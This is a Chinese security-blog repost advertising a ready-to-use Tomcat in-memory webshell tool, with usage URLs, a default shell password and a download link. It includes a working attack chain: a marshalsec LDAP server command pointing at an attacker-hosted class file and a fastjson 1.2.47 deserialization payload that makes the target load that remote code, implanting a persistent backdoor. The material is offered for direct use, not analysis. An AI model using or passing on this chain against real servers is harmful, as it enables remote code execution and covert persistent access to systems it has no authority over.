神兵利器 | 分享 直接上手就用的内存马(附下载)
2022-8-5 08:10:34 Author: 系统安全运维(查看原文) 阅读量:36 收藏

一、工具简介

拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马。

二、使用方法

1、Listener型/Filter型:

CMD内存马URL:xx.xx.xx.xx/?chan=whoami冰蝎内存马URL:xx.xx.xx.xx/     默认连接密码:goautomne

2、Servlet型:

CMD内存马URL: xx.xx.xx.xx/p?chan=whoami冰蝎内存马URL: xx.xx.xx.xx/p     默认连接密码:goautomne

三、利用举例

以fastjson1.2.47版本的反序列化漏洞为例,将对应Tomcat版本的class文件,这里以ILRain.class为例,上传到web服务器,并开启LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102

然后再打入fastjson漏洞的poc,就可以使用冰蝎客户端去连接了

{    "a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"ldap://xx.xx.xx.xx:9102/123",        "autoCommit":true    }}

四、下载地址

项目地址:https://github.com/ce-automne/TomcatMemShell

好文推荐

工具|红队快速批量打点

实战 | App优惠劵无限领取漏洞挖掘记录

利用 EHole 进行红队快速批量打点

神兵利器 - presshell

渗透测试-Ngrok内网映射与穿透

分享 | 几种实战成功过的webshell免杀方式

推荐一款自动向hackerone发送漏洞报告的扫描器

李姐姐开源DNSLog工具eyes.sh

欢迎关注 系统安全运维


文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247506855&idx=1&sn=563506565571f1784ad1cb24008bcc06&chksm=c30808d7f47f81c11b8c5f13ce3a0cc14053a77333a251cd6b2d6ba40dc9296074ae3ffd055e#rd
如有侵权请联系:admin#unsafe.sh